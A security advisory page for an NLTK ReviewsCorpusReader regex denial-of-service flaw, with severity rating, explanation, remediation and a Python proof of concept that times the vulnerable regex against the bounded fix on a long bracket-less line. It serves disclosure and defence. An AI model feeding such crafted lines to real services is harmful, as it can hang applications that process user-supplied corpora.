NLTK CVE-2026-12061
HIGHSeverity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Network vector applies when corpus intake is user-supplied over network; PR:N as no library-level auth exists; A:H for indefinite CPU hang; C/I both N.
Primary rating from GitHub Advisory.
CVSS VectorGitHub Advisory
Lifecycle Timeline
3Blast Radius
ecosystem impact- 7 pypi packages depend on nltk (6 direct, 1 indirect)
Ecosystem-wide dependent count for version 3.10.0.
DescriptionGitHub Advisory
Summary
ReviewsCorpusReader extracts feature annotations of the form *label* followed by a bracketed signed digit (e.g. a label then [+2]) from each review line, using the module-level FEATURES regex. The feature-label sub-pattern is unbounded - an optional greedy run of word-plus-whitespace groups followed by another word, which must then be followed by a literal [. On a long bracket-less line the label can match from every search position to the end of the line, causing quadratic backtracking. A single crafted line in a reviews corpus hangs reviews(), features(), and sents().
Details
The label alternative is a greedy, unanchored run of word-plus-whitespace groups followed by a word, which must then be followed by a literal [. On an input that is a long sequence of word-plus-whitespace with no bracket, at each of the *n* starting positions the engine greedily extends the label to the end of the line, only then fails to find the bracket, and backtracks the whole way. re.findall repeats this from every position, giving O(n²) total work. There is no exponential blow-up, but quadratic growth on an attacker-controlled line length is enough to hang the reader: a single line of ~100,000 words consumes CPU for tens of seconds to minutes.
PoC
import multiprocessing as mp
import re
import time
# --- The vulnerable regex, verbatim from nltk/corpus/reader/reviews.py L70-71 ---
FEATURES_VULN = re.compile(r"((?:(?:\w+\s)+)?\w+)\[((?:\+|\-)\d)\]")
# --- Bounded variant from the fix (PR #3583): cap the per-label word run.
# A generous bound (real feature labels are short noun phrases) makes the
# run linear while never affecting legitimate corpora. ---
WORD_BOUND = 50
FEATURES_FIXED = re.compile(
r"((?:(?:\w+\s){0,%d})?\w+)\[((?:\+|\-)\d)\]" % WORD_BOUND
)
TIMEOUT = 20.0
# seconds, per measurement
SIZES = [1000, 2000, 4000, 8000, 16000]
# words on a single bracket-less line
def _bad_line(n_words):
"""A long line of plain words with NO trailing bracketed annotation."""
return ("word " * n_words).rstrip()
def _worker(pattern_str, line, q):
pat = re.compile(pattern_str)
t0 = time.perf_counter()
pat.findall(line)
q.put(time.perf_counter() - t0)
def timed_findall(pattern, line, timeout=TIMEOUT):
"""Run pattern.findall(line) in a killable process; return seconds or None (timeout)."""
q = mp.Queue()
p = mp.Process(target=_worker, args=(pattern.pattern, line, q))
p.start()
p.join(timeout)
if p.is_alive():
p.terminate()
p.join()
return None
return q.get() if not q.empty() else None
def bench(label, pattern):
print(f"\n[{label}] pattern: {pattern.pattern}")
print(f" {'words':>7} {'~bytes':>8} {'time':>12} {'x prev':>7}")
prev = None
for n in SIZES:
line = _bad_line(n)
t = timed_findall(pattern, line)
if t is None:
print(f" {n:>7} {len(line):>8} {'>%.0fs TIMEOUT' % TIMEOUT:>12} {'--':>7}")
prev = None
else:
ratio = f"{t/prev:.1f}x" if prev else "--"
print(f" {n:>7} {len(line):>8} {t*1000:>9.1f} ms {ratio:>7}")
prev = t
def parity_check():
"""The bound must NOT change extraction on a realistic annotated line."""
real = (
"the picture quality[+2] and battery life[+1] are great but "
"the lens cap[-1] feels cheap and the menu system[-2] is slow"
)
a = FEATURES_VULN.findall(real)
b = FEATURES_FIXED.findall(real)
print("\n[parity] realistic annotated line - extraction must be identical")
print(f" vulnerable regex -> {a}")
print(f" bounded regex -> {b}")
print(f" identical: {a == b}")
return a == b
def main():
print("=" * 66)
print(" NLTK ReviewsCorpusReader FEATURES ReDoS PoC (quadratic backtracking)")
print("=" * 66)
print(f" per-call timeout = {TIMEOUT:.0f}s word bound (fix) = {WORD_BOUND}")
bench("VULNERABLE reviews.py L70-71", FEATURES_VULN)
bench("BOUNDED fix #3583", FEATURES_FIXED)
same = parity_check()
print("\n" + "=" * 66)
print(" Vulnerable: ~4x time per input doubling => O(n^2) quadratic ReDoS")
print(" Bounded: ~2x time per input doubling => O(n) linear, stays in ms")
print(f" Extraction parity on real annotations preserved: {same}")
print(" A single ~100k-word bracket-less review line hangs reviews()/features()/sents().")
print("=" * 66)
if __name__ == "__main__":
main()Impact
Denial of service. Processing a single crafted line through ReviewsCorpusReader consumes CPU quadratically in the line length, hanging the calling thread or process. An application that loads an untrusted or user-supplied reviews corpus (multi-tenant pipelines, services that accept user-provided corpora, batch or CI jobs) can be stalled by one malicious line, with no authentication and no privileges required.
AnalysisAI
Quadratic ReDoS in NLTK ReviewsCorpusReader allows an unauthenticated attacker to hang any application that processes untrusted reviews corpora, by supplying a single crafted line of approximately 100,000 bracket-less words. All NLTK versions through 3.9.4 are affected; the calls reviews(), features(), and sents() are all vulnerable entry points. Publicly available exploit code (PoC) is included in the advisory; no confirmed active exploitation in CISA KEV at time of analysis.
Technical ContextAI
NLTK's ReviewsCorpusReader uses a module-level FEATURES regex defined in nltk/corpus/reader/reviews.py (lines 70-71) to extract feature annotations of the form label[+N] or label[-N] from corpus lines. The regex pattern ((?:(?:\w+\s)+)?\w+)\[((?:\+|\-)\d)\] contains an unbounded greedy label sub-pattern: an optional run of word-plus-whitespace groups followed by a word, which must then be followed by a literal bracket. Python's backtracking NFA regex engine, at each of n starting positions in a bracket-less line, greedily extends the match to end-of-line, fails to find the required '[', and backtracks the full distance. re.findall repeats this from every position, yielding O(n²) total CPU work - quadratic growth rather than exponential, but sufficient to stall processing. CWE-1333 (Inefficient Regular Expression Complexity) precisely describes this root cause. The affected package is pkg:pip/nltk.
RemediationAI
Upgrade NLTK to version 3.10.0 or later using pip install --upgrade nltk; this version introduces a bounded repeat quantifier in the FEATURES regex (PR #3583), capping the per-label word run to 50 iterations and resolving the quadratic backtracking while preserving extraction parity on all legitimate annotated corpora. If immediate upgrade is blocked, applications that accept user-supplied corpora should enforce a maximum line-length limit before passing content to ReviewsCorpusReader - rejecting or truncating lines exceeding a safe threshold (e.g., 10,000 characters) eliminates the attack surface with no functional impact on real review data. Alternatively, if ReviewsCorpusReader is not a required feature, disabling or removing its use entirely is a zero-risk workaround. The full advisory is at https://github.com/nltk/nltk/security/advisories/GHSA-fg7f-2386-8897.
Same technique Denial Of Service
View allVendor StatusVendor
SUSE
Severity: Important| Product | Status |
|---|---|
| SUSE Package Hub 15 SP7 | Fixed |
| SUSE Package Hub 15 SP7 | Affected |
Share
External POC / Exploit Code
Leaving vuln.today
GHSA-fg7f-2386-8897